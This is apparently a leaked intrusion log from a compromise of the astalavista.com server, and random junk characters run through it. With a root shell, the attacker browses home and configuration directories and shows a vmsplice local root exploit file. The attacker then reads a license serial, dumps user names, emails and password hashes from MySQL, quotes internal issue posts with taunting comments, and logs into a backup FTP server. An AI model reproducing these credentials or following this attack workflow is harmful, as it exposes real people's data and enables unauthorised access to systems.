?>3 S( @% H0 i- D7 l7 B9 W+ ?
2 k0 \$ Y' j* Q/ P# ?6 j4 v* b# f
sh-3.2# cd ..# T4 b" n1 M& t$ d& a) x# d) o* r
sh-3.2# cd com
5 v, t; y0 F% Lsh-3.2# ls -la7 K- ?7 w# ?9 Z
total 141208$ \( G$ l2 P9 E* [
drwx–x–x 10 com com 4096 Apr 28 12:40 .( f9 k5 E! R/ V4 b+ K H
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
, [0 p# b: [* r" Wdrwx—— 2 com com 4096 Jun 4 04:04 backups
, O: |1 V; q) M4 _-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql
' A9 G3 h: F9 P3 p- c1 x: |. a7 \drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system( V$ ]- D7 A: U4 }8 y* `2 o0 `
-rw——- 1 com com 21880 Jun 2 08:07 .bash_history- f2 u$ L+ {: r% K# m0 G
-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout2 J. b: i4 f% r5 Z+ \4 `$ L4 I
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
' Z) {$ Z- B7 T! x1 ^5 j/ Z0 [. y-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc
6 f; f+ K2 Z& |3 Kdrwx–x–x 3 com com 4096 Jan 29 2008 domains o7 D; B3 a* W9 m: B! G; x4 w
-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed; K' B% L3 _$ R! s, L; e
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap
/ J6 { g. O8 o, U6 _8 m; a-rw——- 1 com com 69 Nov 18 2008 .lesshst
% ~9 E, e6 o9 o7 e9 ndrwx—— 2 com com 4096 Sep 24 2007 mail8 [2 A# g# B* F% l
-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
7 x! A0 J6 h9 v6 n; x u( L8 ddrwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp" x3 \9 X' k" R
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
- K) R2 l" Y/ i$ Q1 o2 L-rw-r—– 1 com mail 34 Sep 24 2007 .shadow
) p! g, F. u/ q9 a" R" u9 N. fdrwx—— 2 com com 4096 Aug 26 2008 .ssh# u. K9 c7 ` a) H/ f
-rwx—— 1 com com 8515 Feb 10 2008 t
- k5 v, G) \- V5 e' w-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c( G! O/ n0 O' a8 C2 u! J' E4 L
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp! L) r6 ~8 x0 I
-rw-rw-r– 1 com com 617 May 20 2008 .toprc
0 M% \4 d+ @& }, d/ U& F$ F-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql& Q& ]1 K3 Y/ N# e
-rw——- 1 com com 16629 Mar 28 21:46 .viminfo
$ P* E+ d J: M' {-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc. t0 m2 R5 r( Y' a
; T& z- z7 b4 Msh-3.2# head t.c
5 ^! [" R4 p7 m& s7 K0 S/*& a) ]: r( W+ c
* jessica_biel_naked_in_my_bed.c- ^% L4 d$ _: @& \; a
*3 p% J2 S4 _# ]2 v# ?6 y
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.! i! I0 h# O: S, J/ l2 g. a( M
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
6 Z) |7 x S$ M" F2 @$ y- A$ u* Stejnak je to stare jak cyp a aj jakesyk rozbite.
; K9 R; M' a4 d, ~7 p1 b& F*7 W# y% a% S% S# D
* Linux vmsplice Local Root Exploit
& z& Z$ S/ I0 m3 S) b* By qaaz, ~% `& r& M1 O3 q$ T+ B9 E3 G
*3 M$ t/ N# x$ m6 M# @
& ]/ y2 L v; T+ W
sh-3.2# cd /) \0 i" ^. K, e1 q/ H& B
sh-3.2# ls -la' A p# ~8 m$ l! ?
total 3604 O7 t2 Q, `% g) x7 g# [6 C- i
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .; S# z' j" t( K' O; a4 K' y0 R
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .. i* H" b% M# E9 G' ^: S
-rw——- 1 root root 10240 Jun 3 02:39 aquota.group: a9 b5 [2 q' R0 K7 q/ _9 C
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user
1 n8 ` z9 j2 O2 T! m-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db
! m, l& l7 m9 |, J+ i) J3 N-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck0 a: |6 x6 P2 N. r4 d! R/ w
-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
! ]3 T# N/ W. P" ]& Bdrwxr-xr-x 3 root root 4096 Dec 29 2007 backup
8 P2 Y" ?4 U( K x* ydrwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
2 j! b& {- f. o2 @) Cdrwxr-xr-x 5 root root 4096 Jun 2 14:06 boot' F+ ] l1 I% I: X3 F
drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev
# o" ]0 }# v5 o4 h( Mdrwxr-xr-x 84 root root 12288 Jun 4 03:16 etc% k. [8 |. f: u" I' a0 E0 W' D
drwxr-xr-x 14 root root 4096 Mar 11 17:56 home
: e4 j6 i" T- ^6 t7 Z-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf. h6 \) D$ L% V# `! v
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib7 i' u% E* y m, {# {
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64+ n4 w& @8 v/ q1 K
drwx—— 2 root root 16384 Sep 11 2007 lost+found
2 |1 C( [) R; x1 z2 G: P rdrwxr-xr-x 2 root root 4096 Mar 11 17:56 media4 P- t$ ~. A2 M
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc
) S4 H. n9 Z7 C. G! Zdrwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt: v7 q9 @0 z7 [
-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg' a8 Y3 F+ J! F0 S7 F# e
drwxr-xr-x 2 root root 0 Jun 3 02:43 net
L+ h+ g) c$ H( d% Fdrwxr-xr-x 3 root root 4096 Mar 11 17:56 opt# R+ l9 u4 N% [# B1 v+ E
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc
3 {9 D$ B2 z# p* |( T8 h, Ydrwxr-x— 15 root root 4096 Jun 4 08:40 root R7 }9 `; J P+ |. O2 o& T. I1 E
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin, f$ Q" C- J# K( C9 X/ z' Z6 ]9 L
drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux7 P" l0 y: L# O3 K
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv' P1 R, d# N0 B0 u
drwxr-xr-x 11 root root 0 Jun 3 02:42 sys
. y+ q# f. q; n A$ Bdrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp5 J8 E$ R A2 V' c; ^1 K
drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
' y( K! i% D7 Q3 T1 cdrwxr-xr-x 26 root root 4096 Jun 4 03:16 var2 C6 q4 D! R$ P, D6 ?9 ]
) L. x" _' y+ n4 R9 N1 U0 H- Y
sh-3.2# cd opt# G- w5 @ p" q5 B1 T. o
sh-3.2# ls -la
/ I" _ T/ J3 A" T9 `total 20
% O0 X" g9 H: n! b. a% vdrwxr-xr-x 3 root root 4096 Mar 11 17:56 .
" O! k9 Z, W$ n# d: r" tdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
- }! u/ D6 a' W" G- S1 ydrwxr-xr-x 15 root root 4096 Mar 20 2008 lsws* n4 m; \+ O J1 e6 U- H$ K
! g0 G/ M6 Q; J& Y4 M
sh-3.2# cd lsws/: J6 [; n! Y4 g
sh-3.2# ls -la
" u) t+ E" X T0 s+ @total 108& O6 B t v* t L) T3 o; u+ E8 r
drwxr-xr-x 15 root root 4096 Mar 20 2008 .& j3 ?( n6 t# w8 v K
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
i. f7 \# _/ [: O7 q% V& Cdrwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons6 `/ ^ |6 a# M( x6 I8 y
drwxr-xr-x 13 root root 4096 May 29 15:10 admin
( x! g/ w" Q6 [0 F4 }drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate, {" k6 S2 y0 o$ @4 f+ p4 R
drwxr-xr-x 2 root root 4096 May 29 15:10 bin
6 @5 q [8 F2 s' R. |/ ^: | [drwx—— 4 apache apache 4096 Jun 3 02:43 conf
% h- K# g/ O$ i9 Y# Zdrwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT% _4 R2 P3 H. q( C, R
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs
# E+ }3 i1 c; b. r, p; R! a; adrwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
8 y/ }8 V& |- h) B8 Idrwxr-xr-x 2 root root 4096 Sep 15 2008 lib! Y. M' h: Y7 r7 b0 h- c: x* C$ L
-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE9 p4 A/ z' n/ d, H$ K( p
-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
% c8 f. t0 D* k0 b5 i/ J" ]% E-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL* J: H: ]) ], t7 t
-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP- e& S1 z# i; W6 {8 v
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
{; [% R, O4 R, Adrwxr-xr-x 2 root root 4096 Mar 20 2008 php
, k1 y; s# k3 N; @. [/ Z0 M7 G7 Gdrwx—— 2 apache apache 4096 Mar 20 2008 phpbuild7 ]: B. k0 I' g g W% I1 }. H
drwxr-xr-x 3 root root 4096 Mar 20 2008 share
0 ?7 r' y0 g( R6 P0 q( y8 C-rw-r–r– 1 root root 6 May 29 15:10 VERSION9 i; [) F7 E0 x" U8 q& c* F- n
' q" I. Y8 J' Z4 b
sh-3.2# cd conf
: V6 z: D0 t# `/ S1 tsh-3.2# ls -la* v' j5 P) e* T! f6 W
total 485 v' @, F. l* ^, O
drwx—— 4 apache apache 4096 Jun 3 02:43 .% E, B/ J u( q# ~
drwxr-xr-x 15 root root 4096 Mar 20 2008 ..3 `6 E1 `9 O0 T; X u- t
drwx—— 2 apache apache 4096 Mar 20 2008 cert
+ q' ^1 L- \8 Z8 e- S-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml
3 @% T/ F: L# Q# h, E- i9 c-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
+ Y9 J+ H; Y$ p1 G7 B* t; d5 [-rw-r–r– 1 root apache 0 Jun 3 14:11 .last
+ S6 s7 Z3 n. G7 {, n; i-rw——- 1 apache apache 256 May 29 15:10 license.key
# s& L. i) [! w% ^7 f/ O$ b, l5 H-rw——- 1 apache apache 256 Mar 21 2008 license.key.old" A5 n# {5 j+ n, ]& r; j
-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties
( V, G( \* V5 X-rw——- 1 apache apache 20 May 29 15:10 serial.no
6 M# n- u9 P5 o. ~0 |9 cdrwx—— 2 apache apache 4096 Mar 20 2008 templates) m5 U. b7 ^/ }# t6 w9 e
; @0 v. y/ [! d% D
sh-3.2# cat serial.no5 L3 N4 h+ D5 Q4 ^: E6 u$ P
IbDl-oVsO-CKqL-wVRa
5 L0 T% C8 r) ^
9 R$ z9 Z6 j, j" e+ A5 ]sh-3.2# mysql& j1 F& e8 `9 s$ \4 b
Welcome to the MySQL monitor. Commands end with ; or \g.- e! _7 K/ j: p) q9 F4 S# y, |+ V+ Z
Your MySQL connection id is 2868442 E2 t3 G- k, Y+ U G- z
Server version: 5.0.45-community-log MySQL Community Edition (GPL)/ Z9 M. K! P+ u
" _- A7 m9 v, _0 L7 _+ k7 CType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.9 x: }( O3 F: F" L1 Y
/ ^ K, B+ K8 i+ N/ B0 Vmysql> show databases;
f! ?7 A. y4 o, Y9 V J/ n+———————–+
7 i1 G5 o$ w' e& L- C| Database |
1 J4 f2 F! w" [& I, a6 M$ J+———————–+
. S( H& P$ ^) [/ L| information_schema |* q' h9 i, K# Z; N1 M" _1 u
| astanet_ads |
* i, L. ?' `- W* {| astanet_mailing_lists |
# n' S: q" L, S" r/ J| astanet_mediawiki |- n/ B1 e8 u- {& D! k( p& r
| astanet_membersystem |
! i7 k7 f) @( p3 k( ~ Z) S| com_contrexx |
. {) J" d% Z& }% K) j| com_contrexx2 |. s- s3 |8 w! @- Y& L
| com_contrexx2_live |
& ^* K4 V4 l% S' W- o| da_roundcube |
1 b8 {. f/ @5 f| dolphin |
d; @ L- r8 W0 V6 y/ P| ideapool |
7 @" E( D3 s9 k8 A' r/ |: n: p| mysql |
+ a) g( N9 d2 W' m" E% |& {, Y$ O| test |# l' a! o/ ^; [7 @% r( _5 ^
| yourmaster |
" Z1 A; `8 x7 E. {( l |+———————–+: c/ S$ f3 Q' R- j3 s+ ?
14 rows in set (0.00 sec)
6 v" j( q9 v! k) C' H* E2 a2 G: E6 t# p4 I& ]0 S- X
mysql> use ideapool
4 H" z8 w3 {* _Database changed, W4 G% ]+ n/ O6 h* [5 v0 V
mysql> show tables;# Q7 T5 q; r, e9 G& e
+———————————–+
1 m" D4 I7 {- O/ I| Tables_in_ideapool |
# L) ?) O3 H+ m" w8 e+———————————–+ I3 q5 l0 h6 t
| eventum_columns_to_display |0 M3 j8 l. X# y5 ?
| eventum_custom_field |/ n( k5 T- k5 H" W
| eventum_custom_field_option |+ L8 w" r r1 }" m
| eventum_custom_filter |
2 e+ M& s U( m| eventum_customer_account_manager |
1 L8 q( Q5 a0 E* F3 _| eventum_customer_note |6 o) X/ [1 S. G5 U( l0 V* P
| eventum_email_account |% v' s& f4 m6 O2 b4 N; g2 ^
| eventum_email_draft |
/ Z: R. b1 G$ J| eventum_email_draft_recipient |
& W! A+ W0 d& G9 }+ b| eventum_email_response |3 z- y+ R. z5 ]+ l# R5 D
| eventum_faq |; T# y: ~2 |5 t* c3 E6 T
| eventum_faq_support_level |3 D8 I4 W9 e+ B$ T }# z$ `
| eventum_group |# W. A- X) K; l8 {
| eventum_history_type |
$ O8 o" c1 }' |" p2 O* A| eventum_irc_notice |8 B( @8 i+ L$ r! R2 _$ F
| eventum_issue |# {" f% x8 Q9 E0 l) s, `; F
| eventum_issue_association |" c8 x0 ?* P% M. C9 z- G ~. }
| eventum_issue_attachment |
5 O$ m( m, @1 g* d" U# [& A| eventum_issue_attachment_file |
& B1 J) E. h& u7 z D| eventum_issue_checkin |
( C+ S6 u; I3 z( || eventum_issue_custom_field |" j! m$ Q( R0 F$ L1 k) e- l
| eventum_issue_history |" P: m/ L5 O8 V0 H% \0 j
| eventum_issue_quarantine |
; M q; l) P0 D! {+ L| eventum_issue_requirement |
, D/ x) c) c9 j8 ?) s- M; l; F| eventum_issue_user |
; U: L9 U A4 i0 ]| eventum_issue_user_replier |2 t" Z" U) h, h
| eventum_link_filter |
8 f$ t( i) h: d1 F8 Z1 j1 ^1 R1 t, ^| eventum_mail_queue |
+ f. m7 g4 N& H8 H( K) @| eventum_mail_queue_log |
( n, o' c5 i3 y1 K- h5 v/ M6 r| eventum_news |
6 O' w' \& t! i" n4 J) B( m| eventum_note |! l5 G0 K( F/ i( I3 b: Y
| eventum_phone_support |
7 `$ R$ Z) |; w| eventum_project |
8 V; I$ G9 n' b) f5 z. `( y| eventum_project_category |; }3 _$ F! F8 g* I' l
| eventum_project_custom_field |# A' W9 H! e- P
| eventum_project_email_response |
" t5 d0 a" c8 X6 V| eventum_project_field_display |$ T- w/ m3 K1 L. j. N: M* d# B
| eventum_project_group |& f) e% t( u8 H) I: M2 X
| eventum_project_link_filter |
- c& _6 P3 }: x y0 ]& i| eventum_project_news |' v3 Q- y6 j) x& k) f
| eventum_project_phone_category |1 O( D- p; ~4 @% X; I# m; S
| eventum_project_priority |
* I# I( u( `8 t2 W' \5 }! T; I| eventum_project_release |
1 R, p E( ]" S4 \3 s| eventum_project_round_robin |7 ~1 P, W3 W& [1 R
| eventum_project_status |
% r1 @5 k+ _8 ?5 F| eventum_project_status_date |
/ f1 ~ Y& v2 j1 d# P& ?; E% U" I' x' Y| eventum_project_user |
! k2 j q- O0 C# e6 r8 F# ]| eventum_reminder_action |
. r/ u8 I/ Z, x- p| eventum_reminder_action_list |. o7 i6 W. C! G% F D5 p2 N
| eventum_reminder_action_type |
) e/ {. `5 H- A| eventum_reminder_field |# P) I+ F+ j! {% L
| eventum_reminder_history |7 r3 {9 V3 [ X( }( q% @7 _
| eventum_reminder_level |/ o0 i1 ]% E, {" {5 T9 U4 Z
| eventum_reminder_level_condition |
& |- P3 O( [5 T) d| eventum_reminder_operator |
1 [: i: R( m1 H. @1 ]. H| eventum_reminder_priority |
6 L3 V" v# E' Q| eventum_reminder_requirement |
- f* }0 B7 w# Z% W; j| eventum_reminder_triggered_action |
, g" T" C; ?- Z6 f| eventum_resolution |
1 P/ D0 d9 n: n| eventum_round_robin_user |2 X% N" G/ n5 N) g) F1 H( j1 z2 C
| eventum_search_profile | V' A2 `9 x% l5 }4 I# V
| eventum_status |
+ L9 k: v! g3 f. Z+ T: L! l| eventum_subscription |4 x7 m7 T% a! p; q
| eventum_subscription_type |) q% o. y, {$ T2 P4 V* s1 S
| eventum_support_email |
6 i" ^& H* C, R/ j| eventum_support_email_body |
, U$ q7 R& {; [& Q; T8 i, M2 _# P/ q& b| eventum_time_tracking |9 J& B$ R) h$ Z3 n8 F# M9 K, e {: n
| eventum_time_tracking_category |
* x* h4 p" i6 H% R; T5 k* }| eventum_user |
* _0 ?. v$ B* {9 a" o- ]; s+———————————–+0 Y' L& C% \, v% Y' U+ B
69 rows in set (0.00 sec)
8 X$ |% c7 a6 J4 Q% s% x# X
. e( ^9 o( I6 v& cmysql> describe eventum_user;$ o3 s4 E* a& F; O/ J
+————————-+——————+——+—–+———————+—————-+
$ b9 M8 K1 [2 D0 e. B: ?) V| Field | Type | Null | Key | Default | Extra |
( G, s! g. Q `9 h" ^+————————-+——————+——+—–+———————+—————-+" ~* I# L& L( B9 a" y. F
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |+ d8 C) S/ B" c d# s* ]
| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
: V$ Q! L* Z* Y. @; d- g| usr_customer_id | int(11) unsigned | YES | | NULL | |
$ j4 ]: Q P- Z! [| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |" E, h+ E9 A# g. d2 V
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |
- z9 ]* h: [$ h% u3 H7 _7 L| usr_status | varchar(8) | NO | | active | |
2 P, r9 b) L' n) r| usr_password | varchar(32) | NO | | | |
, S+ V4 v- e w7 ^| usr_full_name | varchar(255) | NO | | | |: n$ B7 K0 P; w4 m
| usr_email | varchar(255) | NO | UNI | | |
5 w6 X$ ^, }( E* E. b/ L| usr_preferences | longtext | YES | | NULL | |
: B$ s! i% W; z8 j| usr_sms_email | varchar(255) | YES | | NULL | |
$ b+ q8 Y5 V' R( ~" d) Q" b| usr_clocked_in | tinyint(1) | YES | | 0 | |0 x. @3 y* k; T8 P2 `
| usr_lang | varchar(5) | YES | | NULL | |9 v9 t2 v, R8 X! B% q }1 d! H
+————————-+——————+——+—–+———————+—————-+
9 a/ n; Z( i0 j13 rows in set (0.00 sec)
o3 a! w- G, `" p1 R- a7 n( `# B7 k" v" o$ E
mysql> select usr_full_name,usr_email,usr_password from eventum_user;
7 U. [+ h' v9 k' c% H! f9 ^$ D! ~+———————-+——————————-+———————————-+8 I9 r: c5 X; `* ?
| usr_full_name | usr_email | usr_password |/ V6 O2 w4 z# g1 a) q. z3 M
+———————-+——————————-+———————————-+- x6 E8 W% c" S4 S8 a7 O- H( O: N
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |
5 o3 W( O% q" d. Q4 x' \2 D| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |
% z0 g5 g* f- _, N `| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |( e0 k2 y: {/ F) i. O
| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |& H( W) c! e! g, j$ m9 s$ n# k
| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |8 }. a8 F9 d5 K6 Z; o+ j
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |
: y. g7 f$ ~4 e7 Y9 f| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
% [8 d+ p _& H| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
9 f6 Q! y! g6 w' ^8 V| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
6 J; C, i8 l7 Q5 X b| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |
; o/ s1 ?0 a0 `2 E| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |9 S2 z4 I" g# B9 W
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |6 |. T. V- e J: i
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |& _0 H/ E9 W) Y5 D, ?
| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |
2 {5 i/ e$ l) N| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee | b% M) v j# S3 p% q" Y. S
+———————-+——————————-+———————————-+8 n8 w9 _* D4 N; f8 v; D" }! O8 i
15 rows in set (0.00 sec), B1 E3 W+ Q3 X- ?
+ W) M- I- p% Q& m) B
mysql> select iss_description from eventum_issue where iss_id = 43;3 S) v- V. I! _) z
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+ y( d- }% {* W# r; j5 v
| iss_description - H# a4 i1 H) J& m7 C
|
" i1 c* p% ]/ O3 j7 L+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+3 o* h& y/ W3 X: q( D; A' r7 ?
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be5 I3 \$ c$ P7 S T# T7 o
connected for 90 mins… 120mins… so what i propose is something like:) X, ?9 w5 u7 n# x$ q
链接标记[url]http://www.surfthechannel.com/[/url] k8 {, P: r2 o
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
% C% ^8 K m1 |! w" Y, ^like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t, o: S9 j# R% {& h5 C8 n
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
0 }0 `/ V( x; \0 Q8 vif they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
) }: s8 V. Y) Z! E. n/ c" Z# G& b
6 d% \- v; ? h0 b, nWe could also put advertisement during play on the flash video player itself… extra $$…1 T3 g+ ~8 R8 z+ P" e3 P
* c# _, T' |% w# P4 MBy sykadul |
7 H0 z2 S5 a& m2 _ n @+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
( Z7 k6 F# ~" {! O& P/ f- `- h1 row in set (0.00 sec)
; P+ D. ^2 a: `
8 V2 U. {+ i3 H( ^! }// Money and extra $$ is all they care about. remember that.
0 j* W6 _- h$ H9 z$ r2 M
3 O v* L7 b& o5 _$ amysql> select iss_summary,iss_description from eventum_issue where iss_id =42;" f7 c1 i/ P6 t
+————————+——————————————————————————————————————————————————————————————————————————————-+0 W7 {+ O* L0 n2 S# `# N
| iss_summary | iss_description . ^+ e/ i7 m- }# Y$ `
|
. ~$ f1 O/ @2 r/ D+————————+——————————————————————————————————————————————————————————————————————————————-+% { K% C/ H6 P- f: m; i- f
| Forum for REAL EXPERTS | Hello,4 g/ q# m/ V, {
& a, [, F# d6 [! PIshtus and I,
. B% w+ q, r7 y3 d7 ?* g0 j2 ?" E7 |, m; y5 |$ R% E* X
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
' u8 B- j; Y$ aONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
# g, }" A- I. A% _
. I) \# C- c1 [, x' c+ }$ hOne example a friend of mine from coresecurity.com!
, _4 t4 {/ ]1 z" q5 X. @: l5 I: x; q6 Z
We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
: K I# v; f* [7 L
8 M- Y2 @) G" ?% ~|
5 ^+ F" h. V9 U& M/ |1 r/ e u, u+————————+——————————————————————————————————————————————————————————————————————————————+! _2 R/ M! p8 y' p( e) k
1 row in set (0.00 sec)
" J. X/ }; @* k1 T, J( H- N- D# J7 A y9 s2 b3 b
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
3 y6 P M4 _) ^" |' C7 K! S3 o
/ y; N2 [, F/ V4 H6 @+ x$ W# i9 kmysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;7 ?& e5 Y+ ~. {+ x/ w( U
+——————+———————————————————————————————+6 g" B9 s( O& Y& e! D$ h5 [+ }
| iss_summary | iss_description |% Z2 E* ~- y, i& [. O
+——————+———————————————————————————————+
; T+ Z" k; ? n- A5 p| Website guidance | Virtual Girl which guides you trought the website.
, a" [/ b* u+ i" J: N0 ]
) c& }6 d8 j: s# A- L4 M" Z5 [We need a girl with who you can ( talk )!!!
5 V* H; y5 m- v. |3 K/ S- @9 ^Also for the News!
E7 ~# n5 @! f( x! DSo my suggestion is a girl who read you the news loud if you like! |% N; u# H4 {1 n5 E" ]0 V* [4 C
you can choose between read yourselfe or she read it for you or both!
, r" o& w$ y: o. H( B7 m& z
( C9 _& i/ l9 s+ `- [Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!) p$ d# F* B; c! Y5 |( z
; Q/ |) x4 s' n: z
Have a look on the example girls!!& |' o/ t# A- E0 `
1 E% f" M0 O" E7 E% i链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]- |3 m& w [4 S& [$ t, v, T
' P! e' n& Y: a7 o& I/ z& sor that
, ]* l1 C/ M3 z3 D- g1 U m5 o/ r" F# m$ A1 G1 ~
链接标记[url]http://www.yellostrom.de/[/url]5 z' _6 C7 P, b. [5 I
# A9 Q( n2 J$ p# _) E|& W0 D; t! n& [ X; _$ G# R
+——————+———————————————————————————————+$ O1 _ @2 K8 r
1 row in set (0.00 sec) F3 n( y: S! G% _4 }' F+ I9 M
+ O4 l8 D# [2 i3 m; h% U
// ha ha.
. v( l* q0 a7 o
* L/ t4 ]% _; F8 A* |mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
" j1 |( _# B6 A9 w, I+————————–+———————————————————————————————————–+7 l: s8 @2 F2 g% D8 L5 y, b. L+ ~
| iss_summary | iss_description | y/ T) h5 o" x5 k* t: m
+————————–+———————————————————————————————————–+
; W% K" j; s' i9 ^| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |
. j% f' E5 c$ B4 W+————————–+———————————————————————————————————–++ {9 [- A# y+ W- K( S2 b
1 row in set (0.00 sec): |7 S2 J1 e( l9 C9 I
; Z" w' K5 m/ M# c- I' }$ }- R, Z C// LOL.; j% `) m7 j/ u3 }3 L& w% o
6 t- c w- J' Y. T9 y+ n2 {* jmysql> exit$ b$ h$ U, W9 Q# o/ O1 ~0 N9 J9 C
Bye2 F: ^( V4 p1 w/ x+ z5 e
6 z- y! j% l0 {4 q
sh-3.2# ftp 212.254.194.163
. T" Z1 H) t4 \/ O" t" H0 lConnected to 212.254.194.163.
/ d0 J5 v0 q' Y/ [! K) Q220 BackupCOM_VW FTP server ready.4 Z0 {4 {8 b' v( C( ?0 M6 ~% \- V
504 AUTH: security mechanism ‘GSSAPI’ not supported.( `$ a- e. D' K0 n, x7 G: q
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
/ ?; Y0 d" i% C* pKERBEROS_V4 rejected as an authentication type
2 @' v0 y' v) Y+ mName (212.254.194.163:root): astalavista.com) N' Q3 w) J! m4 o
331 Password required for astalavista.com.
+ a1 i0 d1 _) U4 [: NPassword:$ V& D+ P# h/ }. i/ u; u' H
230 User astalavista.com logged in.
( X7 ^1 d1 ?/ _ P- X; V5 ZRemote system type is UNIX.
" { R! r7 J; ^9 V4 v LUsing binary mode to transfer files.7 B) ^( u, V1 {% H7 P
ftp> ls -la4 W; J: t" y$ p9 Q! W. |: E
227 Entering Passive Mode (212,254,194,163,2,188)* [ I& A2 I% M8 v2 g
150 Opening BINARY mode data connection for ‘file list’. L3 ?, I8 B! q, p
dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com" M( I: C9 X J8 m
226 Transfer complete.
! J7 J( [( P- k3 Bftp> cd astalavista.com( s8 N3 {" m) P/ C" _
250 CWD command successful.: G" Z, `% d/ q
ftp> ls -la0 ^5 Y I7 U: _1 i# G, N
227 Entering Passive Mode (212,254,194,163,2,189)- b9 B, ~( ^4 @3 m$ r' Q9 d, |/ J( l
150 Opening BINARY mode data connection for ‘file list’.
